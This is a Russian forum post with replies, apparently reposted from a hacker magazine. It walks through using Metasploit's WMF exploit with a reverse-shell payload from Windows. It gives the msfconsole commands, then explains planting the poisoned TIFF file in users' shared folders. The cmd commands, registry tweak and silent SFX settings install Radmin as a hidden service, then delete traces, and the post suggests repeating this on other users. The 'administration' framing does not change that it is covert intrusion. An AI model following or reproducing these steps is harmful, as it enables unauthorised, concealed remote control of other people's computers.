Кто не слышал про WMF-баг, с помощью которого можно получить шелл-доступ к практически любому компьютеру использующему системную библиотеку для обработки WMF-файлов? Наверно многие, регулярно читающие ][ знают. Однако многие Win-пользователи, читающие журнал ][ не смогли его использовать по следующим причинам: 1) Отсутствие доступа к никсовому шеллу на удалённом компьютере; 2) Не знание, слабое знание других систем: FreeBSD, LINUX. Возникает вопрос зачем ломать WIN – компьютеры с никсовых шеллов? Почему, бы не протестировать эксплотит c WIN на WIN спросите вы? Не будем разбирать экзотические варианты по вышеуказанным причинам, типа установки под Virtual PC или WMWARE альтернативных систем, а также Cygwin (хотя без него не обойтись, смотри далее). Сделаем всё проще запустим перловый эксплотит в windows. На диске ][ #86 --- лежал пакет Fгаmеwork - но он для никсов!!! Xотя и в его составе есть сплоит ie_xp_pfv_metafile.pm На практике при запуске в Active perl for Win32 он не работает , точнее не работает весь пакет Metasploit Fгаmеwork 2.5 Идём по ссылке http://www.metasploit.com/projects/Framework/downloads.html и скачиваем - “Metasploit fгаmеwork 2.5 Win32 Cygwin Installer”, запускаем MSFConsole , делаем ls exploits и с сожалением обнаруживаем что ie_xp_pfv_metafile.pm там нет!!! Вот облом, подумаете Вы.. Где взять? Ответ прост на DVD ][ или скачать Metasploit ifгаmеwork 2.5 для никсов – в этом пакете он присутствует! То есть достаточно его перекопировать в папку exploits и пользуйтесь на здоровье! Вот так, для Win-пользователей всё упрощается. Всё протестировано на двух WIN_XP_SP2 в локальной сети и работает!!! Что делать дальше, когда Вы получили шелл-доступ с правами систем к удалённому компьютеру с WINDOWS зависит от Вашей фантазии. Для примера расскажу что можно сделать в локальной сети для пользы (точнее для упрощённого администрирования WIN-систем администратором). 1. Удалённая скрытая установка RemoteAdminisrator (RA-система удалённого администрирования, типа удалённый рабочий стол). Не всегда есть доступ к компьютеру пользователя (компьютер занят пользователем, далеко и т. д.). Поэтому воспользуемся WMF – багом и поставим на его компьютер RA удалённо, по локальной сети. Как правило (у нас в локалке, например) каждый юзверь имеет расшареную папку разрешённую для записи и в основном пользуется стандартным проводником (никуда от него не деться – стандартная оболочка, используется в любой программе – файл\открыть файл\сохранить). Запускаем консоль MSFConsole ну а дальше как в ][ № ---, кто не читал, повторюсь msf > use ie_xp_pfv_metafile – будем использовать сплоит для WMF msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse – цепляем реверс-шелл для win32 PAYLOAD -> win32_reverse msf ie_xp_pfv_metafile(win32_reverse) > set LHOST ххх.ххх.ххх.ххх – устанавливаем IP куда будет коннектится реверс-шелл LHOST -> xxx.xxx.xxx.xxx msf ie_xp_pfv_metafile(win32_reverse) > exploit – запускаем эксплоит [*] Starting Reverse Handler. [*] Waiting for connections to http://ххх.ххх.ххх.ххх:8080/ - Поднимается Web-сервер на ранее указанном адресе и ждёт подключений. Через IE на нашей системе зайдём на этот Web-сервер и опа… взломаем сами себя (ну это не страшно). В консоли сделаем exit и не будем над собой издеваться. Теперь зайдём в IE в Сервис\Свойства\Общие\Параметры…\Просмотр файлов…. И найдём ядовитый tiff-файл, содержащий шелл-код, имя файла будет что-то типа «M16R14KtkTuEys0Iqt9M4vqK3ny4Kh1vem[2].tiff» Остаётся скопировать этот файл в папку юзверя (предварительно подняв web-сервер ещё раз на своём компьютере) и ждать когда он откроет папку, содержащую наш ядовитый файл с шелл-кодом. Дождались соединения, юзверь в этот момент ничего не заметит, (если не посмотрит в процессы и не увидит там cmd.exe). Дальше зальём ему RA (предварительно упаковав в SFX-архив RA.exe сам r_server.exe и две необходимые библиотеки AdmDll.dll, raddrv.dll а так же reg-файл для скрытия иконки r_server`a в трее Hide_RA.reg – он меняет один ключ, вот его содержание: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] "DisableTrayIcon"=hex:01,00,00,00 Примечание: Для упаковки в SFX-архив (самораспаковывающийся архив) использовал WinRAR v. 3.2 со следующими параметрами: Path=.\%SystemRoot%\system32\ SavePath Silent=1 Overwrite=2 Можете задать другие, но на мой взгляд это оптимальные. Далее в консоли (уже в консоли cmd) пишем: cd \ `перейти в корень диска cd %SystemRoot%\system32 `задаём текущую папку system32 net share C$$=C: `расшариваем диск C: юзверя – он невидим в сетевом окружении net share D$$=D: `расшариваем диск D: тоже (не знаем где система стоит, может и на D copy /y \\имя компьютера_\Папка_RA\ra.exe %SystemRoot%\system32 `копируем архив RA в системную папку юзверя cmd /c ra.exe `распаковываем всё необходимое для установки r_server и запуска его в скрытом режиме r_server /install /silence `инсталлируем r_server.exe в скрытом режиме как службу reg import Hide_RA.reg `скрываем иконку r_server.exe в трее r_server /start /silence `запускаем скрытно службу r_server.exe `Всё r_server.exe ждёт подключений клиента… delete ra.exe `удаляем архив net share C$$ /delete `удаляем шары net share D$$ /delete exit `выходим из консоли cmd Можно включить в архив run.cmd файл вида: r_server /silence /install reg import Hide_RA.reg r_server /silence /start delete ra.exe net share C$$ /delete net share D$$ /delete exit тогда после: «cmd /c ra.exe» в консоли надо запустить на исполнение его, например так cmd /c run.cmd `инсталлируем и запускаем службу r_server, затем убираем следы exit `выходим из консоли cmd (шелла удалённого компьютера) в консоль MFS msf ie_xp_pfv_metafile(win32_reverse) > exploit `и так далее остальных юзверей… Все права защищены -=lebed=- (c) Вышла новая версия пакета для Win, качать тут: http://metasploit.com/tools/framework-2.6.exe
Я бы порекомендовал афтору - вводить читателей в курс дела, или линки на инфу давать, мне вот совершенно непонятно о чем речь.
Статья моя, изначально опубликована на ксакеп.ру, после чего я там был забанен на форуме... Нужен копирайт, пожалуйста: Все права защищены -=lebed=- (c) P.S. Прочитал тут мега FAQ по Radmin, (уже после), не думайте что инфа от туда получена мной для этой статьи, многое я знал уже давно, прописывание правил для RA в настройки стандартного файрвола XP через cmd - то, что надо!
Ну кто знал, то что надо туда, сюда безопаснее, а то скажут плагиат с xakep.ru. Хотя тут она в оригинале (без всяких исправлений модером) и я могу её если что отредактировать, подправить, продолжить, вообщем кулл!
а можно поподробнее как провернуть вот это дело начиная с вот этого момента и до конца: Дождались соединения, юзверь в этот момент ничего не заметит, (если не посмотрит в процессы и не увидит там cmd.exe)......... я что то не поиму немного.... Поподробнее - кликни Metasploit Framework "Найти статьи" у меня в подписи. ЗЫ Археолог, откопал мою первую статью (-=lebed=-) Тема закрыта, так как давняя, кроме того есть ещё 5 шт. по Metasploit'y ссылки у меня в подписи.
